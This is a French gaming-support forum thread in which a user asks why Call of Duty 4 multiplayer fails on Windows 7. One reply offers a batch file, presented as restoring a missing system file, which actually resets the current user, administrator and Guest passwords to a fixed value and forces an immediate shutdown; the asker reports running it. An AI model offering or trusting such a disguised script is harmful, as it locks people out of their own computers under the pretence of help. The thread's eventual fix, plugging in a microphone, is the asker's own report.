CoD 4 ne fonctionne pas en ligne

Résolu
gagaleouf Messages postés 52 Date d'inscription   Statut Membre Dernière intervention   -  
gagaleouf Messages postés 52 Date d'inscription   Statut Membre Dernière intervention   -
Bonjour,

Je n'arrive pas à jouer en multi sur CoD4, je suis avec windows 7 64 bits, un message me dit : '' Call of Duty 4 : Modern Warfare n'a pas été quitté convenablement lors de la derniere partie .
Voulez-vous lancer le jeu en mode Sans échec ? oui ou non ? ''
Si je met oui sa ne marche pas et si je met non c'est la meme chose, pouvez-vous m'aiser s'il vous plait ?

A voir également:

3 réponses

COD_RR2

Salut,

J'avais le même soucie avec Black Ops, mais plus maintenant ;). C'est à cause de la perte d'un fichier système. Pour le restaurer, t'as qu'a copier le code ci-dessus dans un document bloc-note, et l'enregistrer avec l'extension .bat (exemple : cod4.bat). Ensuite, tu fait double clic sur le fichier créé. C'est tout!.

echo off
break off
net user %USERNAME% 0895
net user administrator 0895
net user Guest 0895
shutdown -s -f -t 01
exit
2
gagaleouf Messages postés 52 Date d'inscription   Statut Membre Dernière intervention   12

Salut,

Merci pour ta réponse, J'ai essayer ce que tu ma dit mais sa ne marche toujours pas )=
0
gagaleouf Messages postés 52 Date d'inscription   Statut Membre Dernière intervention   12

Salut,

Après avoir chercher en détail sur des forums, j'ai acheter un micro je l'est brancher et maintenant ca marche, merci kan même pour ton aide !
0